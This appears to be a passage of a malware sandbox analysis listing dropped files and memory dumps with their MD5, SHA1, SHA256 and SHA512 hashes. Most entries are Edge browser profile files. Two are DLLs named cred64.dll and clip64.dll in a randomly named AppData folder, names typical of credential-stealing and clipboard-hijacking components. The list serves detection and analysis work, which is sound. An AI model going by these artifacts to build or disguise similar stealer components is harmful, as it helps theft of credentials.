memory/6028-1287-0x00007FF753340000-0x00007FF7538E1000-memory.dmp

memory/5680-1315-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a7999d3ff80fb836fb78c79582fd36e0
SHA1 d3b423bb1b300b37fc2f4376051ae05d1fcca31d
SHA256 12e7395b6c2c2e5553cd7c88f309beb93ea3aef4e44e7b773e09050e2d2d6c5b
SHA512 2dc69ff553a30fc53ac3a053caaff1ff17fa7a356c096e6b48a85a95b2f09908f3a079e9855f4d54729955e1fbb87a17dc44754111a5768ff102f21f802c5cfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5f16ac33de6bb301a18c14a0d5ea7b01
SHA1 b2dd9e1d40f524bb44ee4902c6627f475e4d3533
SHA256 7f85e04a10bd69d24a84d51ea47a624823fc5ef75fb0b951f1cdc637a9f74fd2
SHA512 5c6e12e2a48e5b9fad80d708a730d8d45e077d75c6cbd4dccd6e220dc16220628a33cb3dacf9ee2c4d0b32195979345a3cbeeca7ec4fae657c8c08d6a04640dd

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/5836-1446-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 677ca84114ced46c59815f9b713182d0
SHA1 bbaf3b7b1ba0af6c07a65303272c62fa8a4b1378
SHA256 fd6f6352783603e0efc0ab07f237e04c2002f457493e148c80d58d7e3bed7c79
SHA512 ff87f1dd1e78a8c48fe51c401f910a5e86449af34562df48ecdd26a0aea7a1d2011d55f6be958f94962046efb0fec4d909c935ad9a97d9168c326fc76a988307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\6b8e435e-9136-4fd7-bef6-9c03aa5978e1\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 31bba393a9180a1b33901011e3d4b219
SHA1 847ed4b9143f49683d003ff3379b403215da17bc
SHA256 337c8d7adeb1dee1f626a2bcd3bf78a206b194ec60b67942a020974e1a62a631
SHA512 930122b07d61234964de6a300d1f17acd403c1139b88d72e29af23bbe50eebcb1eb848b10a587e8b67de84732aa6db7b819073dd920d4ae644b33b28b0e3c37c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe58c658.TMP

MD5 5b043701a6a38f60970e6b7bda773ec4
SHA1 4e4f803940ab851239b00b59492aedc88b8d193f
SHA256 bc34052267114d85bac37d0ae29e4156d62c3f76fc8248712f7de8972e10a137
SHA512 b0ac23c698945d20fe6bde02eae3d45062328d3f4ec7953610746e7d43b15b86d153c39934ec03feed36a7fce7fadba4e2d77d821264d37807a53bc5b212c545

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 88a0bec955d9f6c52a8132e1accfeff5
SHA1 0318624a6bbf78129c56a9d02ffa44efec288798
SHA256 d59a48c2ebe9ac134e577d4b55e019f85a2eb07ccd52959fdc75da7fb5f4b381
SHA512 7f18f8e4921838fb589eacf94eda3380d976f662e2e8dfe4528fcda5741d20675cb074f3cd57383fb504caa9e3862f2de72d917a72ff88f34504e3c04baee95e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\613a8679-2b47-4632-9ec5-e4d2894aecfe\index-dir\the-real-index

MD5 28e5463617e1a09e22f18d51b6937b48
SHA1 5cc480978172dcc45e1a5607f07945a053532870
SHA256 07402bb510909b8b4184e95b4c7086431e586d8a1c6a6f996fb5c0a96bace459
SHA512 4155b575c3b7855c97599c7eb6980c8c40fc2155d8cfd05edf3e5cf72b5150df2e6ed3f63e541e1094b0984efc0bb4f5c4165797f8b520a9dbe3946b8fca37e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\613a8679-2b47-4632-9ec5-e4d2894aecfe\index-dir\the-real-index~RFe58d53d.TMP

MD5 3af5c4c174a0ffa33dd881a404db7de3
SHA1 6a793c8e664cade14b059d8f201126b092a35ee6
SHA256 40e76f4fdf23b3fd00396653f640425d3bea4c087c20a4f18e837481e9c0f732
SHA512 bf38d8b2aa1789783a1f1b260945b9953270de7e0056cf8f3bdd8738f335ae13c499eb3631aeb4e2fa40e4b66bcfd86c152bfa2886463753ec4791e26aa07505

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c9bc689f-beb4-48d9-a239-1ce421099204\index-dir\the-real-index~RFe58dd8a.TMP

MD5 6befa0fc2d58bb71e635e4ad8760d10f
SHA1 86cd0faf9bf587df3de83495c0868618b2827d2b
SHA256 9d56cbaad1ca76f4882b4022818e7e519982aa95703a26ed4a0b51562be8dcd1
SHA512 c974e5725d5f5ed7459f0a8e6f679298af1f90aeb3c2626eb2d55da247de232526f051bf7409cbba4f8ae13e12f9fc92f36042a2bd867be20427a3ede0180626

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c9bc689f-beb4-48d9-a239-1ce421099204\index-dir\the-real-index

MD5 0b05a2aadb746b34929d72cfe6dba46c
SHA1 84f7b14d49b6c12c8d6cb51e3d3e97591006b062
SHA256 0ef059cdb86d9a85097020766a8d206bc8fdb47426fb9297cbd5101bf6b0d6ea
SHA512 560f8fc91930201ff456a09a94f611d0309be8f87314bd9083ff63a027956234c94f47c4a5c00e394b2644997a72571c40036d0f4750aaae2faece82c3f7ffa6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b9485c20bc9c153fdf4ea39c9bba1053
SHA1 221e6f61bcfdc956e75a8fc910ff056005df040c
SHA256 3c62a6718f9f20b1f5f9223a69f97d56d8cb389b07fd6683fe0257ddd5926322
SHA512 e5fcd6d14abb91329c618631cb205be12c7fe7e6208750a78915c61d895be6c04dc4bf765391fed23fe0ea40762f03895a4fbb817181ef4afd70ae5d7870241e

memory/5836-1639-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 74807d839b68fc9310152765d2b56448
SHA1 64da434c5bb50786be0ceb81d1d43c0e6c5b4cae
SHA256 62c261ff551d6d77adf8b4e262b9a06a7847362410267b1318e1d5e137733a10
SHA512 be33d975e1f86da6e933f947e34cad3076771315187eee115fffce6df984d784ea67a2c125e0d65df87c0b9162fa3f6552fb91aede6360c77053d48501b89c73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

memory/5836-1828-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c6594abb34e8c0b2d5c5a5bf4526c97c
SHA1 e5871acf8d2720cdf75aa4eeb35b938edabbe122
SHA256 84c704c27f4d224739010e88f1a8397c6712a16a3de5de9eb59672f17a5d045c
SHA512 3fd3a450e7b97172b6ebb26b9d6056c1e2ce2f3f9cd5c0fa0d057ff232d69674686e1994ac1984fce2129c72220b0db5c1c911867cc01d66979172789efdd916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 4a5dd94361455e2a537b47bfd3098651
SHA1 cc61f51a44fc738242ac63d4d92b556274df8253
SHA256 67fc42e567e826b20c404b58db49abcb9abe9cb5b076658ff3bdd874edbb151d
SHA512 ad442890706b4a509c292ff3da41443842fcfbbad4cd0b2323524c5dabe827360132088eaee5bab453011d2d41c88de6dddf233b08aeca413308d1490c889732

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5914b7.TMP

MD5 d512e62ee6ddb9528c4f22d95726f845
SHA1 0eb17890557bcfd276d6c7ce0abc199357da2c80
SHA256 e21ad05839564ce109fbd4459b96ff3eb1d9bcb0e42141d9327f5522b9238aab
SHA512 d4b2bbf157ce856b66e9077dd331eb0774db4802b1e32c865b379e08419b1fd7e6207d5001d5ea2031f4c8033c86fcee1320521466e5993bcaaf20d786ec5ce8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 99cdcb75afe17cda9d3e01be28f19613
SHA1 1d83a086337d1703bac9ec68e82e93c166953bc5
SHA256 8688c5a898648ec4a2b247d6c50733086760dc8a7706ae41cd7cd195b229068d
SHA512 d1722f06782cc3660acddad1672b746be3e54bf20202bbd8e9da31388049cb7cfb9bd1c2bae9a8fe67bc953c3bc8dd2ec549be99c5891ca90928805a101a1e1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\b3d2a354-c1d4-4bd2-a648-f5f5a9c7f997\index-dir\the-real-index

MD5 be76ac84fce9529aaecb81f74ead9f71
SHA1 cc1081d5fafe5df3ed45a37b671b33fa7ee2d60e
SHA256 a300eb487ad09f26c734f08fc13686b09ae04bdaa8ee2f5b0838c148c004e1d0
SHA512 7b49314a7be08fd258e2e642d6182b621b4a4213de323e236c4b2981718f47b4c9d03fd09f751d79efb2eda1fbb28d05e73c41a2b0a18c7ea71ff78e48c4444e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\b3d2a354-c1d4-4bd2-a648-f5f5a9c7f997\index-dir\the-real-index~RFe59265a.TMP

MD5 9e7b2edca0f02d9c571c4e03e1cd07fc
SHA1 629817db300a061eac8f210047d7c1363db81b2b
SHA256 0fa028998171b1a2d8e0b51ced23e7ffc7806e5f14c48aac001ffbe1c003bf4b
SHA512 c173c32c1cdefb115d05f1763da8e20a637b5d945456e8b99b8adeeae8a5b0bc7de39194d4e6038e85bb0cfe48f73869f01e3caf8d5b80861bf83721084cd830

memory/4360-1981-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5556-1984-0x00000000007E0000-0x0000000000800000-memory.dmp

memory/3496-1985-0x00007FF78C370000-0x00007FF78C911000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 889569013cf96ba294cf5c7e7e9e2ff3
SHA1 6b3db1dd7695ff330d1bae355c86c17c1d16e4c1
SHA256 73f079ba3ae39d9af55d2b740cc6d6056b98f4f41d1c3ddfdf87a83473f70ce1
SHA512 7c3ab5200e1d33363ccfb89edd70a465cb4c4b5dd33557fbefcd68d9f4ea95b39c92b693062f7907b5d77de58add30e47a88fbc7cb36131209c26852ad560d45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5dacf5479872831940b1a21b53c6843b
SHA1 b9888dc03ba1534082f8c0100e165700563cd362
SHA256 0c3c3ead6e9ad2483643a1085641c5a399e9ffc71462137853ff934b5fad55d3
SHA512 e67c92aea9198f1134580d59a0cdc611e6e1bf55f74b453406691bad9789085ea97c10d55bfd697c24ab9b8394685a312f35a541ca7c7a48b87ac8ef3fc31da4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002f

MD5 d5b05fff282c4e46d9dce60b03ad2705
SHA1 e901bd952fb76597e491fab0b16cc591bb42706d
SHA256 41012e644398ffcea450b7a5592d3a58ff8532fe71c192ad43c77c6337cb2549
SHA512 e1aae31f05090697242c29478a3cbbaee5f13e9ba3f2e31aa3473a438d5ff166e1936ac9defdd7c3d0e8206f24f27fab450f959b3887779e672458ad052a4b47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7ba35a1f7269d9581718236dd565a2eb
SHA1 14d8d159631522bffe7a939a7c59860305d37d20
SHA256 ca85def6bfb8f5168a2352172cbbe22d0a734e5ae39ed1fe05c29e19bb3afb46
SHA512 22c422c2b673ec515bc07697ed13f7d26f04d5fc199ba89ccd0d017392d064bbe8c4fe7186be03ed5e67e4e8c9d3e629dba71aa61d179e0c1004d68a2b58b279

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fab62a9d8a99646c2a4283fd5f23fcc7
SHA1 102eb0cc1ec98768d330978b4606528c94ab6cc4
SHA256 21f8f8e11d675a8e03e6d74d3f55a7573d0e5d8f3c4137f27d78171a95f6d8fa
SHA512 15ff755d9c6070ab6b97c48848a6ab22ea90c3d0f1cd8819c80b9402e9ed0a2ccdb431d26f3770512c74f9bd11c826dd0d00b76856c1b2093a59b730dcf4992c